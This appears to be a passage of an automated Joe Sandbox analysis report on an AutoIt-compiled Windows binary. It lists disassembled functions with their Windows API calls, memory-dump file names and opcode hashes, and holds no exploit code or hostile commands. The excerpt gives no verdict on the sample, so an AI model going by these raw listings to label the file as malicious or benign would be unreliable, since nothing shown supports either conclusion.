                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 42c835bad1e3cb58e239dfbf02a5e5deb96d530e27c7ec176d627c8e4291a0ea
                                                      • Instruction ID: ad6a432cace2f572a8181cf6bfa31bbe5d5e9e31c6dd09aee477362ca0b1c5e7
                                                      • Opcode Fuzzy Hash: 42c835bad1e3cb58e239dfbf02a5e5deb96d530e27c7ec176d627c8e4291a0ea
                                                      • Instruction Fuzzy Hash: E5412C30504640BED7359F79A988B6A7BD1ABD5B18F14603DE24F76560C672E481C711
                                                      Function 00EC2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00EC2D1B
                                                      • GetDC.USER32(00000000), ref: 00EC2D23
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EC2D2E
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00EC2D3A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EC2D76
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EC2D87
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EC5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00EC2DC2
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EC2DE1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: b63ab67f85c08d2e7f531a523bb49b5f28934ae0414265ad34507185d6d90794
                                                      • Instruction ID: d9e5eb460eb366d4d89fb253c6330db421abd63cafde33c6752ec68e23680a46
                                                      • Opcode Fuzzy Hash: b63ab67f85c08d2e7f531a523bb49b5f28934ae0414265ad34507185d6d90794
                                                      • Instruction Fuzzy Hash: 1831A072201214BFEB114F51CD8AFEB3FADEF19715F144069FE09AA291C6769C42CBA1
                                                      Function 00E95622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: e3d6169a187d823ba8bf1118bd365e622729dc18e29ac9ba480fc934b36b8f98
                                                      • Instruction ID: d72b6c8c0fd9f4931492104dfafab0ecbd37869629d7aacf167f7816ee5d8dc5
                                                      • Opcode Fuzzy Hash: e3d6169a187d823ba8bf1118bd365e622729dc18e29ac9ba480fc934b36b8f98
                                                      • Instruction Fuzzy Hash: 7B21FC63741B0577DA155D209E92FFA739DAF10389F442025FD047A642F731EE1583A5
                                                      Function 00EB4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      • Opcode ID: a8a50648ccaf41c17912529238f417a1989c2586b893f26a2f1b49979af34fb1
                                                      • Instruction ID: 16a89c6c1c6ef2f56b85ec73d6e52841311129f2928ec7909f7ffe2f5f8c5138
                                                      • Opcode Fuzzy Hash: a8a50648ccaf41c17912529238f417a1989c2586b893f26a2f1b49979af34fb1
                                                      • Instruction Fuzzy Hash: 6BD19C72A0060A9FDF14DFA8C880BEEB7B5BF48348F149469E915BB281E771DD45CB90
                                                      Function 00E71522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00E717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00E715CE
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E71651
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E717FB,?,00E717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E716E4
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E716FB
                                                        • Part of subcall function 00E63820: RtlAllocateHeap.NTDLL(00000000,?,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6,?,00E31129), ref: 00E63852
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00E717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E71777
                                                      • __freea.LIBCMT ref: 00E717A2
                                                      • __freea.LIBCMT ref: 00E717AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 2829977744-0
                                                      • Opcode ID: 4ca92328f648dffcc5e7df58c2ea4de41129468c0425c86f594d4ba0eafa7ab2
                                                      • Instruction ID: bd66a3c1d031734d10b0b89820bd2405f4673e4a380107101934d932fc85ae6c
                                                      • Opcode Fuzzy Hash: 4ca92328f648dffcc5e7df58c2ea4de41129468c0425c86f594d4ba0eafa7ab2
                                                      • Instruction Fuzzy Hash: 8191D571E003069EDB288EBCC841AEE7BF5AF45754F18A599E809F7180D735DC44C7A0
                                                      Function 00EB4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2610073882-625585964
                                                      • Opcode ID: 7e30b6e72053cb667ac79a08f112aa5d1dc76e3833495e42693bde02cc6674e0
                                                      • Instruction ID: bc545f3a104bec2403026d9aefa5d87141439fbf904ebcf03e32d2d23d5745fd
                                                      • Opcode Fuzzy Hash: 7e30b6e72053cb667ac79a08f112aa5d1dc76e3833495e42693bde02cc6674e0
                                                      • Instruction Fuzzy Hash: B09192B1A00219ABDF24CFA5C844FEF7BB8EF46714F10955AF505BB282D7709945CBA0
                                                      Function 00EA1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00EA125C
                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1284
                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00EA12A8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00EA12D8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00EA135F
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00EA13C4
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00EA1430
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                      • String ID:
                                                      • API String ID: 2550207440-0
                                                      • Opcode ID: 9ee7bf5e7eb78bdbf3c759d49c2f26c1a9a4958d4374e2e53e2908a2c9d1d383
                                                      • Instruction ID: 00e98595f4c4f8ba7ca951b57b7c397104898950a940242d7fe932800615cc51
                                                      • Opcode Fuzzy Hash: 9ee7bf5e7eb78bdbf3c759d49c2f26c1a9a4958d4374e2e53e2908a2c9d1d383
                                                      • Instruction Fuzzy Hash: 7191CF71A00208AFDB049FA8C884BBEB7B5FF4A715F105069E951FB291D774E945CB90
                                                      Function 00E4948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 6f82d9e3f4a68ca1ca2c452874c9c6feaa7c79bc1d53787c0e07d9ed4c1804f1
                                                      • Instruction ID: 284eb5d3886a00fcb3018109f5fe3ce97aaee497aa1715aef60e37590f254ed8
                                                      • Opcode Fuzzy Hash: 6f82d9e3f4a68ca1ca2c452874c9c6feaa7c79bc1d53787c0e07d9ed4c1804f1
                                                      • Instruction Fuzzy Hash: C2914971D00219EFCB10CFA9DC84AEEBBB8FF49324F245159E519B7252D379A942CB60
                                                      Function 00EB3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00EB396B
                                                      • CharUpperBuffW.USER32(?,?), ref: 00EB3A7A
                                                      • _wcslen.LIBCMT ref: 00EB3A8A
                                                      • VariantClear.OLEAUT32(?), ref: 00EB3C1F
                                                        • Part of subcall function 00EA0CDF: VariantInit.OLEAUT32(00000000), ref: 00EA0D1F
                                                        • Part of subcall function 00EA0CDF: VariantCopy.OLEAUT32(?,?), ref: 00EA0D28
                                                        • Part of subcall function 00EA0CDF: VariantClear.OLEAUT32(?), ref: 00EA0D34
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4137639002-1221869570
                                                      • Opcode ID: 12d9cde862843d32a365a2f9d9982e687ac2c1b6ce8e1de5cf4dca5e7ab2ea32
                                                      • Instruction ID: 444142944e29ff71c92f13e0c5ce85c87e0caeb9b61e65cab3011f78cd69e2af
                                                      • Opcode Fuzzy Hash: 12d9cde862843d32a365a2f9d9982e687ac2c1b6ce8e1de5cf4dca5e7ab2ea32
                                                      • Instruction Fuzzy Hash: ED9157756083059FCB04DF28C4859AABBE5FF88314F14982DF889AB351DB31EE45CB92
                                                      Function 00EB4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E9000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?,?,00E9035E), ref: 00E9002B
                                                        • Part of subcall function 00E9000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?), ref: 00E90046
                                                        • Part of subcall function 00E9000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?), ref: 00E90054
                                                        • Part of subcall function 00E9000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?), ref: 00E90064
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00EB4C51
                                                      • _wcslen.LIBCMT ref: 00EB4D59
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00EB4DCF
                                                      • CoTaskMemFree.OLE32(?), ref: 00EB4DDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 614568839-2785691316
                                                      • Opcode ID: bd5460dc49a65981bb48a211bb83a6abbe423d9673b3042e9db607b34239d088
                                                      • Instruction ID: 2d746c27052478840562c88a1ae9e89694559e7d11fa5828a6a24d733f3928e5
                                                      • Opcode Fuzzy Hash: bd5460dc49a65981bb48a211bb83a6abbe423d9673b3042e9db607b34239d088
                                                      • Instruction Fuzzy Hash: 679128B1D0021DAFDF14DFA4C885AEEBBB8BF48314F105169E915BB291DB709A45CF60
                                                      Function 00EC20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00EC2183
                                                      • GetMenuItemCount.USER32(00000000), ref: 00EC21B5
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EC21DD
                                                      • _wcslen.LIBCMT ref: 00EC2213
                                                      • GetMenuItemID.USER32(?,?), ref: 00EC224D
                                                      • GetSubMenu.USER32(?,?), ref: 00EC225B
                                                        • Part of subcall function 00E93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E93A57
                                                        • Part of subcall function 00E93A3D: GetCurrentThreadId.KERNEL32 ref: 00E93A5E
                                                        • Part of subcall function 00E93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E925B3), ref: 00E93A65
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EC22E3
                                                        • Part of subcall function 00E9E97B: Sleep.KERNEL32 ref: 00E9E9F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 4196846111-0
                                                      • Opcode ID: 05c8371a0b5ca81810982d10ee5b0437b916f8e366e1ff3d6c357eef9c0937d1
                                                      • Instruction ID: 20558e5e328eb67883336309d132356bb171fc36f85e3962d0c8cda2177c64e4
                                                      • Opcode Fuzzy Hash: 05c8371a0b5ca81810982d10ee5b0437b916f8e366e1ff3d6c357eef9c0937d1
                                                      • Instruction Fuzzy Hash: 66719D75A00205AFCB14EF64C945EAEBBF1EF48324F14946CE916BB351D736ED428B90
                                                      Function 00E9AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00E9AEF9
                                                      • GetKeyboardState.USER32(?), ref: 00E9AF0E
                                                      • SetKeyboardState.USER32(?), ref: 00E9AF6F
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E9AF9D
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E9AFBC
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E9AFFD
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E9B020
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 1b34bbe3aca3d75d7b27d5930aa1886dbe2088ca9c35188b2b8bb652362de3be
                                                      • Instruction ID: 2ccec73306498dd03474ba0aba2f3b8ce7259050cce2e3def54d014e6b1be014
                                                      • Opcode Fuzzy Hash: 1b34bbe3aca3d75d7b27d5930aa1886dbe2088ca9c35188b2b8bb652362de3be
                                                      • Instruction Fuzzy Hash: 2D51E0A0A047D57DFF364234CC49BBABEE95F06308F0C9499E1D9658C2C399A8C8D791
                                                      Function 00E9ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00E9AD19
                                                      • GetKeyboardState.USER32(?), ref: 00E9AD2E
                                                      • SetKeyboardState.USER32(?), ref: 00E9AD8F
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E9ADBB
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E9ADD8
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E9AE17
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E9AE38
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 510fcbc4d0b42d85ceafc2e6f9a886d50c769f99a76d2c6350d81e6035d83dcf
                                                      • Instruction ID: 38cea8bccadbae6067f01b590d58aac7338927a8e9c98f81be6fc658a943e4df
                                                      • Opcode Fuzzy Hash: 510fcbc4d0b42d85ceafc2e6f9a886d50c769f99a76d2c6350d81e6035d83dcf
                                                      • Instruction Fuzzy Hash: BC51D6A15047D53DFF3683348C55B7A7ED85F46308F0C94A9E1D5668C2D294ECC8D792
                                                      Function 00E6542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(00E73CD6,?,?,?,?,?,?,?,?,00E65BA3,?,?,00E73CD6,?,?), ref: 00E65470
                                                      • __fassign.LIBCMT ref: 00E654EB
                                                      • __fassign.LIBCMT ref: 00E65506
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00E73CD6,00000005,00000000,00000000), ref: 00E6552C
                                                      • WriteFile.KERNEL32(?,00E73CD6,00000000,00E65BA3,00000000,?,?,?,?,?,?,?,?,?,00E65BA3,?), ref: 00E6554B
                                                      • WriteFile.KERNEL32(?,?,00000001,00E65BA3,00000000,?,?,?,?,?,?,?,?,?,00E65BA3,?), ref: 00E65584
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 3f438ebb3a24238bc99f9625a9d5651b258222108ab508e9b1626eaeac8d28c6
                                                      • Instruction ID: c63017d89a7e1a8ea30a5719b0ef2a0583510cc2ac8a1079b905bf720fab1f00
                                                      • Opcode Fuzzy Hash: 3f438ebb3a24238bc99f9625a9d5651b258222108ab508e9b1626eaeac8d28c6
                                                      • Instruction Fuzzy Hash: D151B0B1A006499FDB10CFA8E845AEEBBF9EF48340F14515AF956F7291D6309A41CF60
                                                      Function 00EB10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00EB304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EB307A
                                                        • Part of subcall function 00EB304E: _wcslen.LIBCMT ref: 00EB309B
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EB1112
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1121
                                                      • WSAGetLastError.WSOCK32 ref: 00EB11C9
                                                      • closesocket.WSOCK32(00000000), ref: 00EB11F9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
